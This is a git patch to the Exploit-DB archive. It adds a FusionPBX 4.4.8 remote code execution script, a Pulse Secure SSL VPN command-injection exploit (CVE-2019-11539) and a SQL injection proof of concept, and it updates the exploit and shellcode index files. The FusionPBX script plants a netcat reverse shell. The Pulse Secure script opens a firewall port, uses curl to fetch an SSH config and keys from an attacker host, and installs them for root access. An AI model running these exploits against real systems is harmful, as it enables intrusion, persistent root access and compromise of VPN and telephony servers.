From ad97ff419814f10fb6ad1ad84e4156b5f260409b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 7 Sep 2019 05:02:21 +0000 Subject: [PATCH] DB: 2019-09-07 3 changes to exploits/shellcodes SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2) Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3) SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution FusionPBX 4.4.8 - Remote Code Execution Inventory Webapp - 'itemquery' SQL injection Linux/x86 - TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes) --- exploits/linux/remote/47358.py | 83 ++++++++++++++++ exploits/multiple/remote/47354.py | 157 ++++++++++++++++++++++++++++++ exploits/php/webapps/47356.txt | 37 +++++++ files_exploits.csv | 13 ++- files_shellcodes.csv | 2 +- 5 files changed, 286 insertions(+), 6 deletions(-) create mode 100755 exploits/linux/remote/47358.py create mode 100755 exploits/multiple/remote/47354.py create mode 100644 exploits/php/webapps/47356.txt diff --git a/exploits/linux/remote/47358.py b/exploits/linux/remote/47358.py new file mode 100755 index 000000000..86a849630 --- /dev/null +++ b/exploits/linux/remote/47358.py @@ -0,0 +1,83 @@ +#!/usr/bin/python3 + +''' +# Exploit Title: FusionPBX v4.4.8 Remote Code Execution +# Date: 13/08/2019 +# Exploit Author: Askar (@mohammadaskar2) +# CVE : 2019-15029 +# Vendor Homepage: https://www.fusionpbx.com +# Software link: https://www.fusionpbx.com/download +# Version: v4.4.8 +# Tested on: Ubuntu 18.04 / PHP 7.2 +''' + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import sys +import warnings +from bs4 import BeautifulSoup + +# turn off BeautifulSoup and requests warnings +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +if len(sys.argv) != 6: + print(len(sys.argv)) + print("[~] Usage : ./FusionPBX-exploit.py url username password ip port") + print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337") + + exit() + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] + + +request = requests.session() + +login_info = { + "username": username, + "password": password +} + +login_request = request.post( + url+"/core/user_settings/user_dashboard.php", + login_info, verify=False + ) + + +if "Invalid Username and/or Password" not in login_request.text: + print("[+] Logged in successfully") +else: + print("[+] Error with creds") + +service_edit_page = url + "/app/services/service_edit.php" +services_page = url + "/app/services/services.php" +payload_info = { + # the service name you want to create + "service_name":"PwnedService3", + "service_type":"pid", + "service_data":"1", + + # this value contains the payload , you can change it as you want + "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z", + "service_cmd_stop":"stop", + "service_description":"desc", + "submit":"Save" +} + +request.post(service_edit_page, payload_info, verify=False) +html_page = request.get(services_page, verify=False) + +soup = BeautifulSoup(html_page.text, "lxml") + +for a in soup.find_all(href=True): + if "PwnedService3" in a: + sid = a["href"].split("=")[1] + break + +service_page = url + "/app/services/services.php?id=" + sid + "&a=start" +print("[+] Triggering the exploit , check your netcat !") +request.get(service_page, verify=False) \ No newline at end of file diff --git a/exploits/multiple/remote/47354.py b/exploits/multiple/remote/47354.py new file mode 100755 index 000000000..0930391d3 --- /dev/null +++ b/exploits/multiple/remote/47354.py @@ -0,0 +1,157 @@ +#!/usr/bin/python +# +# Exploit Title: Pulse Secure Post-Auth Remote Code Execution +# Google Dork: inurl:/dana-na/ filetype:cgi +# Date: 09/05/2019 +# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_) +# Vendor Homepage: https://pulsesecure.net +# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 +# Tested on: linux +# CVE : CVE-2019-11539 +# +# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_) +# +# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN +# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root. +# You will need your own configuration and authorized_keys files. +# +# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539 +# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html +# +# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization. +# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free. +# +# Imports +import requests +import urllib +from bs4 import BeautifulSoup + +# Host information +host = '' # Host to exploit +login_url = '/dana-na/auth/url_admin/login.cgi' # Login page +CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump +CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code + +# Login Credentials +user = 'admin' # Default Username +password = 'password' # Default Password + +# Necessary for Curl +downloadHost = '' # IP or FQDN for host running webserver +port = '' # Port where web service is running. Needs to be a string, hence the quotes. + +# Proxy Configuration +# Uncomment if you need to use a proxy or for debugging requests +proxies = { + # 'http': 'http://127.0.0.1:8080', + # 'https': 'http://127.0.0.1:8080', +} + +# Headers for requests +headers = { + 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', + 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language':'en-US,en;q=0.5', + 'Accept-Encoding':'gzip, deflate', + 'Content-Type':'application/x-www-form-urlencoded', +} + +# Cookies to send with request +cookies = { + 'lastRealm':'Admin%20Users', + 'DSSIGNIN':'url_admin', + 'DSSignInURL':'/admin/', + 'DSPERSISTMSG':'', +} + +# Data for post request +loginData = { + 'tz_offset': 0, + 'username': user, + 'password': password, + 'realm': 'Admin Users', + 'btnSubmit': 'Sign In', +} + +s = requests.Session() # Sets up the session +s.proxies = proxies # Sets up the proxies + +# Disable Warnings from requests library +requests.packages.urllib3.disable_warnings() + +# Administrator Login logic +# Probably wouldn't have figured this out without help from @buffaloverflow +def adminLogin(): + global xsAuth + global _headers + + # Send the intial request + r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies) + + print('[#] Logging in...') # Self Explanatory + r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request + print('[#] Sent Login Request...') + + # Login Logic + if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""): + referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer + r = s.get(referer, verify=False) # Sends a get request + soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser + FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr + print('[#] Grabbing xsauth...') + xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token + print('[!] Got xsauth: ' + xsAuth) # Self Explanatory + data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page + _headers = headers # Sets the headers + _headers.update({'referer':referer}) # Updates the headers + r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request + + print('[+] Logged in!') # Self Explanatory + +# Command injection logic +def cmdInject(command): + r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies) + if r.status_code == 200: + soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser + xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token + payload = { + 'a':'td', + 'chkInternal':'On', + 'optIFInternal':'int0', + 'pmisc':'on', + 'filter':'', + 'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command, + 'toggle':'Start+Sniffing', + 'xsauth':xsAuth + } + # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie + DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")} + # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run + # Sends the get request to overwrite the template + r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies) + # Sends the get request to execute the code + r = s.get('https://' + host + CommandExecURL, verify=False) + +# Main logic +if __name__ == '__main__': + adminLogin() + try: + print('[!] Starting Exploit') + print('[*] Opening Firewall port...') + cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port + print('[*] Downloading Necessary Files....') + cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config + cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys + print('[*] Backing up Files...') + cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config + cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys + print('[*] Overwriting Old Files...') + cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config + cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys + print('[*] Restarting SSHD...') + cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP + print('[!] Done Exploiting the system.') + print('[!] Please use the following command:') + print('[!] ssh -p6667 root@%s') %(host) + except Exception as e: + raise \ No newline at end of file diff --git a/exploits/php/webapps/47356.txt b/exploits/php/webapps/47356.txt new file mode 100644 index 000000000..1592089ec --- /dev/null +++ b/exploits/php/webapps/47356.txt @@ -0,0 +1,37 @@ +# Exploit Title: Inventory Webapp SQL injection +# Data: 05.09.2019 +# Exploit Author: mohammad zaheri +# Vendor HomagePage: https://github.com/edlangley/inventory-webapp +# Tested on: Windows +# Google Dork: N/A + + +========= +Vulnerable Page: +========= +/php/add-item.php + + +========== +Vulnerable Source: +========== +Line39: $name = $_GET["name"]; +Line39: $description = $_GET["description"]; +Line39: $quantity = $_GET["quantity"]; +Line39: $cat_id = $_GET["cat_id"]; +Line49: if(mysql_query($itemquery, $conn)) + + + +========= +POC: +========= +http://site.com/php/add-item.php?itemquery=[SQL] + + + +========= +Contact Me : +========= +Telegram : @m_zhrii +Email : neoboy503@gmail.com \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d05ef0932..70a3d4ab2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6698,7 +6698,7 @@ id,file,description,date,author,type,platform,port 591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,local,linux, 600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow",2004-10-26,anonymous,local,linux, 601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Local Buffer Overflow",2004-10-26,infamous41md,local,linux, -602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",local,sco, +602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon de C Valle",local,sco, 624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",local,linux, 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple, 657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux, @@ -7413,7 +7413,7 @@ id,file,description,date,author,type,platform,port 9540,exploits/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,local,windows, 9542,exploits/linux_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",local,linux_x86, 9543,exploits/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",local,linux, -9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon Valle",local,linux, +9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon de C Valle",local,linux, 9548,exploits/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows, 9550,exploits/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows, 9551,exploits/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)",2009-08-31,mr_me,local,windows, @@ -7427,7 +7427,7 @@ id,file,description,date,author,type,platform,port 9581,exploits/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,local,windows, 9589,exploits/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)",2009-09-04,hack4love,local,windows, 9595,exploits/linux/local/9595.c,"HTMLDOC 1.8.27 - '.html' File Handling Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",local,linux, -9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon Valle",local,linux, +9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon de C Valle",local,linux, 9608,exploits/linux/local/9608.c,"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow",2009-09-09,"Jeremy Brown",local,linux, 9610,exploits/windows/local/9610.py,"Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)",2009-09-09,blake,local,windows, 9618,exploits/windows/local/9618.php,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows, @@ -7435,7 +7435,7 @@ id,file,description,date,author,type,platform,port 9624,exploits/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,local,windows, 9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux, 9628,exploits/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,local,windows, -9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon Valle",local,linux, +9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon de C Valle",local,linux, 9645,exploits/aix/local/9645.sh,"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",local,aix, 9655,exploits/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,local,windows, 9659,exploits/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow",2009-09-14,"fl0 fl0w",local,windows, @@ -9098,7 +9098,7 @@ id,file,description,date,author,type,platform,port 24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,local,windows, 24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows, 24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",local,linux, -24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",local,sco, +24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon de C Valle",local,sco, 24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",local,unix, 24366,exploits/windows/local/24366.rb,"Microsoft Windows - Manage Memory Payload Injection (Metasploit)",2013-01-25,Metasploit,local,windows, 24374,exploits/windows/local/24374.c,"Ipswitch IMail Server 7/8 - Weak Password Encryption",1999-12-20,Adik,local,windows, @@ -17660,6 +17660,8 @@ id,file,description,date,author,type,platform,port 47347,exploits/java/remote/47347.rb,"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)",2019-09-03,Metasploit,remote,java,443 47348,exploits/hardware/remote/47348.rb,"Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)",2019-09-03,Metasploit,remote,hardware,443 47353,exploits/linux/remote/47353.rb,"AwindInc SNMP Service - Command Injection (Metasploit)",2019-09-05,Metasploit,remote,linux, +47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple, +47358,exploits/linux/remote/47358.py,"FusionPBX 4.4.8 - Remote Code Execution",2019-09-06,Askar,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41705,3 +41707,4 @@ id,file,description,date,author,type,platform,port 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php, 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80 +47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 29b38e727..2bdc50a19 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1000,4 +1000,4 @@ id,file,description,date,author,type,platform 47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux -47352,shellcodes/linux_x86/47352.c,"Linux/x86 - TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode",2019-09-05,guly,shellcode,linux_x86 +47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86